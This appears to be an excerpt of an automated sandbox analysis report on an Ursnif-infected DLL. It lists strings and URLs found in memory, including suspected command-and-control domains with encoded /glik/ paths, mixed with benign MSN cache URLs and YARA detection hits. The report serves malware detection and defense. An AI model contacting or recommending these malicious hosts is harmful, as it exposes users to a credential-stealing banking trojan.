                      Source: rundll32.exe, 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmpString found in binary or memory: http://avolebukoneh.website
                      Source: rundll32.exe, 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmpString found in binary or memory: http://avolebukoneh.website/glik/.lwe.bmp08899
                      Source: regsvr32.exe, 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmpString found in binary or memory: http://avolebukoneh.website/glik/.lwe.bmp088991256473871MNTYAIDA1010010B
                      Source: regsvr32.exe, 00000002.00000002.880576445.0000000002F97000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
                      Source: loaddll32.exe, 00000000.00000002.880735294.00000000016F0000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.756172604.0000000002F70000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mic
                      Source: {5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
                      Source: imagestore.dat.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                      Source: rundll32.exe, 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmpString found in binary or memory: http://technoshoper.com
                      Source: msapplication.xml.4.drString found in binary or memory: http://www.amazon.com/
                      Source: msapplication.xml1.4.drString found in binary or memory: http://www.google.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
                      Source: msapplication.xml2.4.drString found in binary or memory: http://www.live.com/
                      Source: msapplication.xml3.4.drString found in binary or memory: http://www.nytimes.com/
                      Source: msapplication.xml4.4.drString found in binary or memory: http://www.reddit.com/
                      Source: msapplication.xml5.4.drString found in binary or memory: http://www.twitter.com/
                      Source: msapplication.xml6.4.drString found in binary or memory: http://www.wikipedia.com/
                      Source: msapplication.xml7.4.drString found in binary or memory: http://www.youtube.com/
                      Source: rundll32.exe, 00000003.00000002.884652837.00000000054F0000.00000004.00000001.sdmpString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                      Source: regsvr32.exe, 00000002.00000003.734351733.0000000003000000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.726519233.00000000054F1000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/MicrosoftEdgeDownload&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d36
                      Source: regsvr32.exe, 00000002.00000003.734498309.0000000004FC1000.00000004.00000040.sdmpString found in binary or memory: https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.c
                      Source: rundll32.exe, 00000005.00000003.726877023.0000000005896000.00000004.00000001.sdmpString found in binary or memory: https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html
                      Source: rundll32.exe, 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmpString found in binary or memory: https://avolebukoneh.website
                      Source: regsvr32.exe, 00000002.00000002.880576445.0000000002F97000.00000004.00000020.sdmpString found in binary or memory: https://avolebukoneh.website/
                      Source: regsvr32.exe, 00000002.00000003.845351193.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://avolebukoneh.website/e
                      Source: regsvr32.exe, 00000002.00000003.800848610.0000000002F76000.00000004.00000001.sdmpString found in binary or memory: https://avolebukoneh.website/glik/KwktcAgJA3haqk0/Ms0fL0B4XccTTFIyK9/usG_2BHjp/uyERKVkE6Su_2Fw3uS2y/
                      Source: regsvr32.exe, 00000002.00000003.845331673.0000000002F70000.00000004.00000001.sdmpString found in binary or memory: https://avolebukoneh.website/glik/kUbizXMZCF/wcseO9tQzGMWY7_2B/Eo6XsQr55EXJ/TJZ97_2F328/3bdZBpl1pP_2
                      Source: regsvr32.exe, 00000002.00000003.686079514.0000000002F76000.00000004.00000001.sdmpString found in binary or memory: https://avolebukoneh.website/glik/oPO1MTCZATyGVB9JDx/_2BxLrMZv/XGH5EgNCAONySOCpr4U_/2F_2FSC6yLxw_2BR
                      Source: regsvr32.exe, 00000002.00000003.823530558.0000000002F70000.00000004.00000001.sdmpString found in binary or memory: https://avolebukoneh.website/glik/pAGZhq9MI53nZ7
                      Source: regsvr32.exe, 00000002.00000003.756172604.0000000002F70000.00000004.00000001.sdmpString found in binary or memory: https://avolebukoneh.website/glik/pAGZhq9MI53nZ7OH/rIg4LX9fBTj6p
                      Source: regsvr32.exe, 00000002.00000003.731474179.0000000002F70000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.731155022.0000000002F76000.00000004.00000001.sdmpString found in binary or memory: https://avolebukoneh.website/glik/pAGZhq9MI53nZ7OH/rIg4LX9fBTj6pjl/8TeMZNhc43A_2FVYsQ/YCg3QZ_2F/BXKX
                      Source: regsvr32.exe, 00000002.00000003.845351193.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://avolebukoneh.website/l
                      Source: regsvr32.exe, 00000002.00000003.845351193.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://avolebukoneh.website/lI
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=195119&amp;a=3064090&amp;g=25021476
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24545562
                      Source: {5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
                      Source: {5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                      Source: {5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://doceree.com/.well-known/deviceStorage.json
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://doceree.com/us-privacy-policy/
                      Source: rundll32.exe, 00000005.00000003.726877023.0000000005896000.00000004.00000001.sdmpString found in binary or memory: https://docs.microsoft.co
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://evorra.com/product-privacy-policy/
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                      Source: rundll32.exe, 00000003.00000003.726519233.00000000054F1000.00000004.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1637661098&amp;rver
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1637661098&amp;rver=7.0.6730.0&am
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1637661099&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1637661098&amp;rver=7.0.6730.0&amp;w
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://nextmillennium.io/privacy-policy/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://optimise-it.de/datenschutz
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
                      Source: {5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat.4.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://secure.adnxs.com/clktrb?id=764680&amp;t=1
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://silvermob.com/privacy
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://smartyads.com/privacy-policy
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
                      Source: imagestore.dat.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAQXqYx.img?h=368&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
                      Source: rundll32.exe, 00000003.00000002.884652837.00000000054F0000.00000004.00000001.sdmpString found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://support.skype.com
                      Source: loaddll32.exe, 00000000.00000002.880807454.0000000001AE8000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmpString found in binary or memory: https://technoshoper.com
                      Source: regsvr32.exe, 00000002.00000002.880576445.0000000002F97000.00000004.00000020.sdmpString found in binary or memory: https://technoshoper.com/
                      Source: regsvr32.exe, 00000002.00000003.823390201.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://technoshoper.com/H
                      Source: regsvr32.exe, 00000002.00000003.708524872.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://technoshoper.com/Y
                      Source: regsvr32.exe, 00000002.00000002.880512445.0000000002F70000.00000004.00000020.sdmpString found in binary or memory: https://technoshoper.com/glik/DGgts_2FWsor6_2F7EcO1Do/0g4WUbLA1T/K9_2Bu0NIeWan9Hma/XZBvL_2BDNj7/jAap
                      Source: regsvr32.exe, 00000002.00000003.778713654.0000000002F76000.00000004.00000001.sdmpString found in binary or memory: https://technoshoper.com/glik/OQ_2FSYw86Sxjr/PESASP_2FSM3YGvvX26Dq/ljvCWkBfAIxpXwGa/HkN5fLu170jCgxh/
                      Source: regsvr32.exe, 00000002.00000003.708500123.0000000002F76000.00000004.00000001.sdmpString found in binary or memory: https://technoshoper.com/glik/lsOg58W5F/6ZKRcoE0Nf7NwQdc4and/0Ilh3sQ5ND8zcWVsYpl/LRv_2FK7ZV_2F34vpiC
                      Source: regsvr32.exe, 00000002.00000003.664286279.0000000002F73000.00000004.00000001.sdmpString found in binary or memory: https://technoshoper.com/glik/qu_2BrFb5C/WnN6ktioLVJSC7NZ8/8U42mL0TVXds/GucNTaVpvRD/cGAaQnoHqkvTq7/u
                      Source: regsvr32.exe, 00000002.00000003.845351193.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://technoshoper.com/glik/rHKCmFtHVZPPm/wqY5wPH_/2F29vTv7wl_2FGq_2BrLvy6/oSB1MCzJ6Y/1nsQKibmjik_
                      Source: regsvr32.exe, 00000002.00000003.778604990.0000000002F97000.00000004.00000001.sdmpString found in binary or memory: https://technoshoper.com/k
                      Source: loaddll32.exe, 00000000.00000002.880807454.0000000001AE8000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmpString found in binary or memory: https://technoshoper.comhttps://avolebukoneh.websitehttp://technoshoper.comhttp://avolebukoneh.websi
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://twitter.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://twitter.com/i/notifications;Ich
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.botman.ninja/privacy-policy
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;t
                      Source: imagestore.dat.6.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/
                      Source: {5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/%c3%b6ffentliche-terrassen-und-mehr-velowege-dar%c3%bcber-stimm
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/brand-an-der-langstrasse/ar-AAQXL4f?ocid=hplocalnews
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/defektes-paket-mit-radioaktivem-inhalt-in-swiss-flieger-entdeck
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/die-stadt-will-neue-velostationen-und-f%c3%bchrt-vierstunden-pa
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/er-schrie-g%c3%b6nd-weg-verpisst-euch-dann-gab-er-gas/ar-AAR0rV
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/kann-bei-diesem-tempo-und-so-vielen-passagieren-nicht-einfach-b
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-liefert-sich-wilde-verfolgungsjagd-mit-der-poli
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-st%c3%bcrzt-nach-verfolgungsjagd-mit-der-polize
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/whistleblower-verliert-vor-gericht-gegen-z%c3%bcrcher-unispital
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport/other/runter-rauf-runter-wie-gc-in-genf-vom-weg-abkommt/ar-AAQYdQe?o
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.onlineumfragen.com/3index_2010_agb.cfm
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.queryclick.com/privacy-policy
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skype.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de/download-skype
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/ssp-datenschutz
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.tippsundtricks.co/gesundheit/finger-persoenlichkeit/?utm_campaign=DECH-Finger&amp;utm_so
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.tippsundtricks.co/gesundheit/knoblauchzehe-unters-kopfkissen/?utm_campaign=DECH-Knoblauc
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.tippsundtricks.co/lifehacks/schwamm-kuhlschrank/?utm_campaign=DECH-schwamm&amp;utm_sourc
                      Source: unknownDNS traffic detected: queries for: www.msn.com
                      Source: global trafficHTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.6:49823 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.6:49821 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613835753.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612880805.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612995967.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880807454.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701819091.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613174085.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.664565353.000000000513D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620214841.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702016309.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613794834.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.642767964.000000000523B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881549232.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620265495.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635568127.0000000004E5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620243933.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613948347.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620142786.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701985470.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.679769381.0000000004C5F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702307918.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.657340118.0000000004D5D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620475830.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701915707.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613862631.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613818747.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884432102.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613737711.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620285363.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613014620.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612932234.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.658506384.000000000507D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612953290.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620302187.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612852123.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701957231.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.746687116.000000000186D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.768852725.000000000176F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.686987362.000000000503F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701777888.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702038882.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
